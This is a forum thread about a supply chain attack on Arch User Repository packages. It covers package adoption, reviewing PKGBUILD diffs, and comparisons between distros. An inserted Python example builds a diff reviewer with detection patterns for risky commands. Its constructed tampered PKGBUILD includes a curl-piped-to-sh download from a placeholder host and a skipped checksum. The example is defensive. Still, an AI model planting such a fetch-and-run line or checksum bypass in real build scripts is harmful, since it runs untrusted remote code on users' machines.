this post was submitted on 16 Jun 2026
599 points (97.8% liked)

linuxmemes
    [–] punkcoder@lemmy.world 161 points 2 weeks ago (1 children)

    Real talk for a moment: there isn't a system alive that currently solves the supply chain attack issue. There's a trade-off between usability and security. You can be as secure as you want to be; all it takes is a small accident by one developer in a package that you're using, even if they're using GPG signing, to accidentally upload a package that's been tampered with. It stinks, but that's the reality. What I think should be applauded is the thoroughness with which the Arch developers are going through the repo right now trying to find these packages. I don't know the specifics, but if they're like other open source developers, they're unpaid people doing this out of their love for the software and community. And more than likely, this is a headache on top of headaches that they already have, that they're doing for the love of the community.

    [–] RustyNova@lemmy.world 8 points 2 weeks ago (2 children)

    Idk how the AUR works, but I like that nix fetches the source from the repo and also checks its hash against a maintainer-provided one. Prevents repo hijacking.

    Although it's still pretty much vulnerable if the attacker controls both the nix file and the repo.

    [–] bitfucker@programming.dev 16 points 2 weeks ago

    Every *-git package also fetches it from the repo. The apt analogy is someone hasn't been maintaining the nixpkg and then it gets adopted by someone else. Now that someone else changes the build script to be malware. So it is no fault of the upstream.

    [–] sudo@programming.dev 5 points 2 weeks ago

    That wouldn't have fixed the AUR incident because the attacker updated the PKGBUILD which is roughly the same as the nixfile. And there are no packages provided by the AUR, just PKGBUILDs. You always build the package yourself locally.

    [–] adhdsergio@lemmy.world 53 points 2 weeks ago (1 children)

    Meanwhile, Windows users: btw, first time? 💀🪢

    [–] jasoman@lemmy.world 6 points 2 weeks ago (1 children)

    Wait, AUR works in Windows?

    [–] adhdsergio@lemmy.world 71 points 2 weeks ago (3 children)
    [–] jasoman@lemmy.world 23 points 2 weeks ago (5 children)

    It is ok, Micro$oft is asking me to call so they can fix it for me.

    [–] wizardbeard@lemmy.dbzer0.com 12 points 2 weeks ago (3 children)

    I legitimately have not had virus issues with Windows in over a decade. Using uBlock Origin for ad blocking and the built in Microsoft antivirus. Every few months for the first few years I'd put it through the wringer of a bunch of USB-bootable antivirus scanners. They kept finding nothing, so I slowed and eventually stopped bothering.

    Common sense and an ad blocker do wonders.

    [–] adhdsergio@lemmy.world 6 points 2 weeks ago

    To be fair, me neither, but every time somebody has an infected machine, it is Windows.

    [–] Quetzalcutlass@lemmy.world 4 points 2 weeks ago

    I'll second that ad blocking and common sense are probably enough. On every one of my machines, Windows Defender hasn't reported finding anything that wasn't a false positive in all the years it's existed, even before it was bundled with Windows. And I'm someone who constantly installs random indie games and niche software.

    Ad blockers and secure connections preventing MitM attacks did more to eliminate viruses than most anti-malware ever could. Viruses used to be everywhere in the old days, but now you usually only hear about them spreading through supply chain attacks or targeted campaigns.

    [–] OwOarchist@pawb.social 4 points 2 weeks ago

    Trying to run pirated games will burn you occasionally, though.

    But that's okay. My gaming PC is only for gaming. If it manages to get a virus that I can't quickly resolve, I'll just wipe it and restore from backup. And the biggest tragedy there will be that I won't be able to play games for a few hours. Meanwhile, my Linux PC that does everything important is completely safe.

    [–] cyberpunk007@lemmy.ca 4 points 2 weeks ago

    Extensively.

    [–] agentTeiko@piefed.social 21 points 2 weeks ago (5 children)

    I'm not going to lie, the AUR never made sense to me. If you are going to go to all that trouble, why not just package it? Source packages are a thing.

    [–] rtxn@lemmy.world 33 points 2 weeks ago* (last edited 2 weeks ago)

    The developers themselves are often not the package maintainers. Before a package is published or updated in one of the official Arch repos, it has to be built, tested, and sometimes patched (which is why you see a -1, -2, etc. appended to the package version), in order to work correctly not just on its own but in an Arch system with Arch packages that it is likely to encounter. The process is not as thorough as Debian for example, but it's still the responsibility of the package maintainer. If the package is still in early development, deprecated (e.g. wine32), an out-of-tree kernel module (e.g. xpadneo-dkms), or is meant to be built from the latest available commit (any number of *-git packages), the AUR is a convenient way to share PKGBUILD files rather than have the user build the software manually based on a readme, if it even includes build instructions. The PKGBUILD is then ingested by makepkg, which both configures the environment and builds the software, and outputs a package that can then be installed and managed by Pacman.

    The caveat is that packages built from the AUR are not vetted by any package maintainers. They can have bugs, they might depend on outdated or no-longer-existent packages, or might contain malware.

    [–] stepan@lemmy.cafe 22 points 2 weeks ago (7 children)

    it makes sense to me. remove as much friction from the publishing process as possible, so you get a huge amount of packages. this incident just shows they removed a little too much.

    there are so many niche packages on the aur useful to so few people that nobody would go through the official process to properly package, test, and maintain them.

    for example: vscodium is a fork of vscode, but microsoft disables the marketplace for it. the vscodium-marketplace package from the aur adds it anyway. i don't think any regular repos have these kinds of hacks and patches available.

    [–] Shatur@discuss.tchncs.de 15 points 2 weeks ago* (last edited 2 weeks ago)

    Source packages are a thing.

    AUR is a repository for source packages (in Arch it's called PKGBUILD) from users. You can write PKGBUILD yourself or just download it from AUR if someone already made it.

    [–] muusemuuse@sh.itjust.works 18 points 2 weeks ago

    Back when I was learning Arch, they made sure you understood AUR is an option; it was never a good option. Even then the risks were just not worth it.

    My understanding of the AUR was that it was supposed to be a "here's how I made this work." But it gets treated as a generic repo all the time, so… this.

    [–] carmo55@lemmy.zip 17 points 2 weeks ago (2 children)

    Why is adoption a thing in this way, though? People compare AUR to GitHub, which seems very apt, but on GitHub no one can come and take over the URL of an abandoned repo for themselves; if someone wants to start maintaining and the old owner is MIA, they have to make a fork. Why doesn't AUR work the same way, but instead allows anyone to take over any abandoned project with no checks?

    [–] communism@lemmy.ml 8 points 2 weeks ago (2 children)

    The forking option wouldn't work as well as it does on github because AUR packages are not namespaced like GitHub repos, e.g. communism/mypackage; instead it's just mypackage. So if adoption required a new name you'd have mypackage-cont, mypackage-cont-cont, or whatever. And it wouldn't really be possible to introduce username namespacing because AUR packages are just Pacman packages that are community-contributed rather than official, and Pacman, like most package managers, doesn't namespace their package names; firefox is just firefox rather than, say, mozilla/firefox. Some AUR packages get added to the official repos so when you do, e.g. yay -Syu, you'll then install the official package if you previously had the AUR package installed as it has the same name.

    There isn't a perfect solution. Even if package adoptions were moderated, someone could take over a package and initially push a genuine commit, and then their next commit is malicious. Reviewing every single AUR commit would be incredibly labour-intensive. Possibly you could add automated checks for commits that suddenly add an npm install or other suspicious command with regex, but attackers could just get cleverer about avoiding those regex checks. Imo the best solution is just more widespread warnings about the fact that AUR packages are community-contributed with no guarantees of safety (e.g. on the Arch wiki where it sometimes suggests users install AUR packages), and AUR helpers forcing users to read PKGBUILDs before installation.

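To make the "read the diffs" habit several commenters describe and the automated regex check communism@lemmy.ml suggests concrete, here is an added Python example (not code from this thread, the AUR or makepkg; the PKGBUILD text, hostnames and heuristic patterns are all constructed) that diffs an old and a new PKGBUILD and flags risky additions before makepkg ever runs them.

```python
import difflib
import re

# Reviewer heuristics (constructed for this example; attackers can avoid them, so they complement reading the diff).
SUSPICIOUS = [
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "remote script piped to a shell"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"\b(npm|pip)\s+install\b", "package manager invoked during build"),
    (r"\beval\b", "eval of constructed text"),
    (r"sha256sums=\(.*'SKIP'", "integrity check skipped"),
]

def added_lines(old, new):
    """Return (line number in new, text) for every line added in new."""
    out, lineno = [], 0
    # n=0: no context lines, so only '+' lines advance the new-file counter.
    diff = difflib.unified_diff(old.splitlines(), new.splitlines(), lineterm="", n=0)
    for line in diff:
        if line.startswith("@@"):  # hunk header "@@ -a,b +c,d @@"
            lineno = int(re.match(r"@@ -\S+ \+(\d+)", line).group(1))
        elif line.startswith(("+++", "---")):
            continue  # file headers
        elif line.startswith("+"):
            out.append((lineno, line[1:]))
            lineno += 1
    return out

def new_hosts(old, new):
    """Hosts referenced by URL in new but nowhere in old (e.g. a changed source=)."""
    hosts = lambda text: set(re.findall(r"https?://([^/'\"\s]+)", text))
    return hosts(new) - hosts(old)

def review(old, new):
    """Findings as (line number or None, reason, text) for a PKGBUILD update."""
    findings = []
    for lineno, text in added_lines(old, new):
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, text):
                findings.append((lineno, reason, text.strip()))
    for host in sorted(new_hosts(old, new)):
        findings.append((None, "new download host", host))
    return findings

# Constructed sample: a benign PKGBUILD and a tampered update of it.
OLD_PKGBUILD = """\
pkgname=fooapp
pkgver=1.2.0
pkgrel=1
source=("https://github.com/example/fooapp/archive/v$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$pkgname-$pkgver"
  make
}
"""
NEW_PKGBUILD = OLD_PKGBUILD.replace(
    "sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')",
    "sha256sums=('SKIP')",
).replace("  make\n}", "  make\n  curl -s https://updates.example.invalid/setup.sh | sh\n}")
```

With the constructed sample, review(OLD_PKGBUILD, NEW_PKGBUILD) reports line 5 (sha256sums set to SKIP), line 10 (curl piped to sh) and the new host updates.example.invalid; a run with no findings is not proof that a PKGBUILD is safe.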
    [–] basxto@discuss.tchncs.de 15 points 2 weeks ago

    Did somebody get infected by installing https://aur.archlinux.org/packages/sex ?

    [–] Gork@sopuli.xyz 13 points 2 weeks ago (3 children)

    It bothers me that the movie this meme is based on removed the head rests. Smh my head.

    [–] chaotic_disorganizer@lemmy.world 11 points 2 weeks ago (2 children)

    Every movie does that. Just how they remove helmets from bikers and armor. Gotta see the actors' beautiful faces after all.

    [–] tkk13909@sopuli.xyz 9 points 2 weeks ago (1 children)

    What's even worse is the helmets with lights on the inside, so bright that all the character would see is their own reflection.

    [–] Zelaf@sopuli.xyz 7 points 2 weeks ago

    And lose their darkness vision; looking at some of those SciFi space helmets, basically completely blinded.

    [–] 14th_cylon@lemmy.zip 5 points 2 weeks ago

    Star Trek would not make it through the first season if they wore EV suits every time they beamed down...

    [–] eager_eagle@lemmy.world 8 points 2 weeks ago

    shake my head rest

    [–] CubitOom@infosec.pub 13 points 2 weeks ago (1 children)

    I use the AUR extensively and wasn't impacted by the supply chain attack because I read the diffs.

    [–] ReginaPhalange@lemmy.world 13 points 2 weeks ago (2 children)

    Be real for a second:
    did you, or did you not, manage to review a diff and say "no, that looks fishy"?

    Do you really think you are immune from compromised binary AUR packages that are being downloaded straight from GitHub? Sure, now it's not only the AUR that's bad, but at the end of the day, a malicious binary did arrive at your computer.

    Let's say that you don't use *-bin packages, and only download from compilable source. Are you immune from the strategy that the state actor who caused CVE-2024-3094 used to compromise packages?

    [–] CubitOom@infosec.pub 5 points 2 weeks ago

    at the end of the day, a malicious binary did arrive at your computer.

    No, it didn't.

    [–] locahosr443@lemmy.world 10 points 2 weeks ago

    I have like 4 things installed from aur, investigated each one first, and I'm still paranoid about all of them.

    [–] mrbutterscotch@feddit.org 8 points 2 weeks ago (5 children)

    Relatively new Linux user here.

    I've seen a few posts about malware on Linux mentioning things called AUR and NPM.

    I understand they are package managers? Is that something I have to worry about as a Bazzite user?

    [–] M0oP0o@mander.xyz 15 points 2 weeks ago (1 children)

    Not likely. Just know that AUR is user driven and not checked or vetted.

    [–] mrbutterscotch@feddit.org 4 points 2 weeks ago (1 children)

    Yeah, I try to stick to the native flatpak manager for bazzite. Are there any other vetted software managers out there that you would recommend?

    [–] sudo@programming.dev 10 points 2 weeks ago (1 children)

    npm: Node Package Manager.
    AUR: Arch User Repository.

    Bazzite is based on Fedora, not Arch, so you don't need to worry.

    [–] irate944@piefed.social 6 points 2 weeks ago

    I use malware btw

    [–] parlaptie@feddit.org 5 points 2 weeks ago (2 children)

    Is this referring to some specific event or is it just a general warning about AUR?

    I use AUR for "legacy" NVidia drivers btw

    [–] Eccowave@feddit.org 8 points 2 weeks ago

    It's referring to those unfortunate findings

    [–] mecen@lemmy.ca 5 points 2 weeks ago (1 children)

    To be fair, AUR should be merged with nix or something to share efforts and be cross-platform.

    There are also AppImages; if used as FlatImage, which uses bubblewrap as a sandbox, even if there is malware its impact would be minimised.

    [–] jasoman@lemmy.world 5 points 2 weeks ago

    Like saying, as a Windows user, "I got called by Microsoft."

    [–] DupaCycki@lemmy.world 4 points 2 weeks ago (7 children)

    A lot of people probably won't like this, but personally I feel like Arch is a terrible OS from an average user's perspective. It offers nothing notable of value to its users, while making sacrifices in critical areas.

    Unstable as hell and constantly breaks for no reason. On top of that, it's seriously insecure, as shown on exhibit A. It's not the first time, and it won't be the last.

    Why not use Mint, Fedora, Zorin, Pop!_OS, or any of countless Linux distros that work perfectly and don't suffer from Arch's issues?

    Note: I'm not an OS developer and mean no hate towards Arch devs or users. I'm simply speaking from a user experience perspective.

    [–] f4f4f4f4f4f4f4f4@sopuli.xyz 14 points 2 weeks ago* (last edited 2 weeks ago) (2 children)

    You said Ubuntu three times. /s

    AUR is supposed to be the last resort, after distro repos, building from source, Flatpak, and AppImage. Ubuntu's equivalent to the AUR would be PPAs.

    Personally, I have fewer problems gaming on Arch than any other I've tried.

    Edit: Snap is bad for software freedom. I won't touch Ubuntu anymore; if I use apt, I meant apt and not snap. Hijacking my command is Microsoft-style rug-pulling.

    [–] cryptix@discuss.tchncs.de 7 points 2 weeks ago (1 children)
    [–] f4f4f4f4f4f4f4f4@sopuli.xyz 10 points 2 weeks ago

    I had heard that Ubuntu is an old African word for "can't configure Debian"

    [–] Sceptique@leminal.space 14 points 2 weeks ago (4 children)

    My experience is Arch is more stable than Ubuntu. Broke once in the last 10 years, because of a bug in a package; fixed the system with a manual upgrade from a live USB in 1h. AUR is not part of the Arch Linux repositories, it's a community thing with mostly the same security problems every similar package manager has (npm, gems, etc.)

    1-1, we did not learn anything except you don't like arch.

    [–] infinitesunrise@slrpnk.net 14 points 2 weeks ago* (last edited 2 weeks ago) (2 children)

    "Unstable as hell", "breaks for no reasons", "seriously insecure", other distros "work perfectly". I find this kind of uninformed hyperbole tiring, but probably entirely descriptive of your own user journey. Arch is intended for technical users, not "average users" (Whatever that means), and people should not be recommending that their uninitiated friends start their Linux journey there unless they're prepared and capable of providing technical support. I used Fedora and Ubuntu for decades before moving to Arch a few years ago, and I've never loved an OS more than I love this one. But that's my journey.

    [–] sudo@programming.dev 8 points 2 weeks ago (4 children)

    Arch is deliberately minimal, making it a good base system in the same way Debian or Fedora is. It's smaller, simpler, updates faster than the others and is far more configurable. It is however not built for the average user, and most distros built on top of it that try to make it more "usable" are IMO pretty dangerous ideas. I think the only derivative I've tried that was good was SteamOS, because they made it atomic like nix or Silverblue.

    None of this really has to do with the AUR. That was always labelled as "use at your own risk". And to their credit they caught and addressed the attack within a day of it happening. Still, hosting user PKGBUILDs and leaving it to individual users to audit them is not a secure solution, its just punting on the responsibility.

    [–] trackball_fetish@lemmy.wtf 4 points 2 weeks ago

    I'd just like to interject for a moment. What you're referring to as Berkeley Software Distribution is, in fact, Unix, or as I've recently taken to calling it, Ma Bell Berkeley Unix.
